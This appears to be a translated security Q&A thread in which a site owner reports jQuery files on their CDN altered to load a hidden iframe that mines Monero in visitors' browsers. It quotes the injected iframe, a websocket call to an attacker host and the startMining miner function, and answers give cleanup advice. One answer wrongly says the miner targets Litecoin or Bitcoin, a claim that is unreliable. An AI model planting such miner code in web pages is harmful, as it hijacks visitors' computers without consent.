Monero siendo extraído en nuestro servidor

Navega tus respuestas
0

Me di cuenta de que recientemente nuestro sitio web ha tenido un rendimiento deficiente y, a menudo, utiliza el 100% del uso de la CPU en las máquinas de los usuarios. Después de analizar esto, he notado que todos los archivos jquery en nuestro CDN se editaron hace 6 días y ahora están minando el lado del cliente de Monero cuando la gente visita nuestro sitio web.

El siguiente iframe se está cargando en nuestra página: 

<iframe src="https://www.jqr-cdn.download/lot.html"style="width: 0px; height: 1px;">
<html>
    <head></head>
    <body>
        <script src="jquery-3.3.1.js"></script>
        <script>
            server = "wss://www.jqr-cdn.download:8190";
            startMining("minexmr.com","winner winner chicken dinner");
        </script>
    </body>
</html>

Yo pienso esto se debe a que nuestro S3 se puede escribir públicamente (tendré que analizarlo)

Mis preguntas son:

¿Esto solo ha sido una sanguijuela de la CPU, o algo más malo sucedió a través de este método de ataque (recolección de datos, etc.)

¿El hecho de cerrar nuestro S3 y sobrescribir los archivos con copias genuinas resolverá el problema, si es así lo resolveremos de forma permanente?

¿Cuál es el significado del parámetro "cena de pollo ganadora ganadora", es este un nombre de usuario, solo una burla o algo más?

    
pregunta Aphire 18.06.2018 - 17:00
fuente

3 respuestas

3

En primer lugar: su servidor ha sido comprometido. El atacante tiene los medios para cambiar el archivo en el sitio web, copiando cualquier archivo. Es muy probable que también tenga acceso a cualquier base de datos, si el sitio tiene acceso a la base de datos, el atacante puede encontrar las credenciales y acceder a ella también.

Por lo general, este tipo de ataques son los que generan menos trabajo y el mayor pago: suelte un archivo javascript de minería criptográfica y desaparezca. Este tipo de scripts utilizará la CPU de los visitantes para extraer criptomonedas, la gran mayoría siendo Monero. Monero es una moneda enfocada en la privacidad: es absurdamente difícil encontrar al dueño de una cartera Monero, incluso el FBI tiene problemas para hacerlo. Pero también están apareciendo otras monedas.

¿Cómo limpiar?

Primer paso: limpie su cuenta de Amazon . Supongamos que el atacante tiene acceso a él, y todas las credenciales en él. Esto es crítico, se debe hacer inmediatamente, antes que nada.

Segundo: restaura tus copias de seguridad para limpiar el sitio. Mire cualquier archivo subido por el usuario (si su sitio tiene esta funcionalidad), mire los registros de acceso para detectar cualquier cosa sospechosa.

Tercero: verifique la base de datos, prestando especial atención a las tablas relacionadas con el control de acceso y la autenticación del usuario. Vea si se ha creado algún procedimiento almacenado o desencadenador, y límpielo también.

Dependiendo del contenido de su sitio (como datos personales del usuario, registros médicos o financieros, etc.), categoría y jurisdicción, debe alertar a sus usuarios sobre la violación.

    
respondido por el ThoriumBR 18.06.2018 - 20:19
fuente
4

El Java-Script enlace está cargado. Si lo formateas, se ve así:

enlace

Luego se llama a la función startMining. 

function startMining(e, r, m, n, y) {
    m = void 0 === m ? "" : m;
    n = void 0 === n ? -1 : n;
    y = void 0 === y ? "" : y;
    wasmSupported && (stopMining(), connected = 0, handshake = {
        identifier: "handshake",
        pool: e,
        login: r,
        password: m,
        userid: y,
        version: 5
    }, startBroadcast(function() {
        addWorkers(n);
        reconnector()
    }))
}

No pude ver ninguna indicación en el script de que se haya accedido a sus datos, pero debería volver a verificar todo el script.

Tenga en cuenta que el script podría cambiarse, por lo que nunca podría estar seguro, el script actual en el servidor es el script ejecutado en su sistema.

Debe comprobar cómo el atacante colocó los archivos jquery en su sistema. Si los archivos son de escritura para todos, este podría ser el problema y reemplazar con una copia de seguridad y ajustar los derechos debería ayudar. No olvide cambiar las contraseñas, ya que el atacante podría haberlas extraído.

    
respondido por el trietend 18.06.2018 - 18:08
fuente
2

Comenzando con tu última pregunta:

La frase: "cena de pollo ganadora ganadora" Representa un minero de CPU para Litecoin y Bitcoin (principalmente Bitcoin). Lo que significa:

Este minero de JQuery usa Protocolo de Websockets para conectarse al Maestro y usa minexmr.com Service to mine Litecoin y / o Bitcoin con los Slaves (todos, que abren su sitio web)

La mayoría de los navegadores modernos tienen una función para evitar la minería no deseada que lanzó el sitio web o el código en un sitio web. Como por ejemplo opera 50 .

A tu segunda pregunta:

Sí, si no alguien hizo los cambios explícitamente, has sido hackeado. Considere revisar todos los datos en ese servidor y también cambie la contraseña a una 2FA o MFA segura (compleja) o incluso mejor con una contraseña compleja.

y ahora al primero:

Sí, normalmente es solo una secuencia de la CPU para extraer una moneda Crypto, pero mientras no tenga acceso a los datos de origen de este script, nadie podrá decir si esta es la única razón.

    
respondido por el Pawel Kostelnik 18.06.2018 - 17:52
fuente

Lea otras preguntas en las etiquetas

Configuración de un dominio en Veil-Evasion para la carga útil nmap informa que un host remoto está activo, mientras está apagado? [cerrado]